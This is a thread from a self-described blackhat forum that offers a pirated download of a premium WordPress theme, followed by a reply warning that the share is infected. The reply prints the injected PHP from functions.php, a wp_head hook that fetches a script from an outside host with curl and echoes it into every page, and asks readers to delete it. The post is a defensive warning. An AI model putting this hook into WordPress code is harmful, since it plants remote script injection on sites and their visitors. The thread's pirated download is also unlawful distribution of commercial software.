Best Blackhat Forum

Full Version: [GET] Headlines - WooThemes Premium Wordpress Theme
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Headlines - WooThemes Premium Wordpress Theme

Headlines continues where our old magazine themes left off. It has tons
of requested features like featured area, social bookmarks, author
highlighting, flexible layout to name a few. It’s the perfect platform
to launch your magazine or blog and reach out to the world!

Demo:


Code:
woothemes.com/demo/headlines/


Download:
http://bestblackhatforum.com/Thread-GET-...#pid259070
THE ABOVE SHARE IS INFECTED
It contains a wp_head injection
I am about to leave for a meeting, so have no time to clean and re-sahre right now.

please open functions.php and remove the following from the end of the code

Code:
<?php
function jqueryj_head() {

if(function_exists('curl_init'))
{
$url = "http://www.shigg.com/soft/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'jqueryj_head');
?>

I will check this users other shares when I return tonight.

Cheers,
Si
do we have a clean version of this?
Reference URL's